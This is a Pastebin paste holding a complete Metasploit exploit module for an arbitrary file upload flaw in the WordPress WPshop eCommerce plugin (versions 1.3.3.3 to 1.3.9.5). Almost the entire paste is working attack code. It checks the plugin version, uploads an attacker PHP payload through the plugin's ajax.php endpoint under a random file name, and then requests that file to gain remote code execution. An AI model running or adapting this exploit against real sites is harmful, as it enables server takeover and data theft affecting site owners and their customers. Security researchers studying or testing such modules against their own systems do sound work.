Advertisement
Guest User

exploit

a guest
Apr 27th, 2015
239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. require 'msf/core'
  7.  
  8. class Metasploit3 < Msf::Exploit::Remote
  9. Rank = ExcellentRanking
  10.  
  11. include Msf::HTTP::Wordpress
  12. include Msf::Exploit::FileDropper
  13.  
  14. def initialize(info = {})
  15. super(update_info(info,
  16. 'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
  17. 'Description' => %q{
  18. This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
  19. from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
  20. code execution. This module has been tested successfully on WordPress WPshop eCommerce
  21. 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
  22. },
  23. 'Author' =>
  24. [
  25. 'g0blin', # Vulnerability Discovery, initial msf module
  26. 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
  27. ],
  28. 'License' => MSF_LICENSE,
  29. 'References' =>
  30. [
  31. ['WPVDB', '7830'],
  32. ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
  33. ],
  34. 'Privileged' => false,
  35. 'Platform' => 'php',
  36. 'Arch' => ARCH_PHP,
  37. 'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
  38. 'DisclosureDate' => 'Mar 09 2015',
  39. 'DefaultTarget' => 0)
  40. )
  41. end
  42.  
  43. def check
  44. check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
  45. end
  46.  
  47. def exploit
  48. php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
  49.  
  50. data = Rex::MIME::Message.new
  51. data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
  52. data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
  53. post_data = data.to_s
  54.  
  55. res = send_request_cgi(
  56. 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
  57. 'method' => 'POST',
  58. 'ctype' => "multipart/form-data; boundary=#{data.bound}",
  59. 'data' => post_data
  60. )
  61.  
  62. if res
  63. if res.code == 200 && res.body =~ /#{php_page_name}/
  64. print_good("#{peer} - Payload uploaded as #{php_page_name}")
  65. register_files_for_cleanup(php_page_name)
  66. else
  67. fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
  68. end
  69. else
  70. fail_with(Failure::Unknown, "#{peer} - Server did not answer")
  71. end
  72.  
  73. print_status("#{peer} - Calling payload...")
  74. send_request_cgi(
  75. { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
  76. 5
  77. )
  78. end
  79. end
  80.  
  81. # 1337day.com [2015-04-27] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement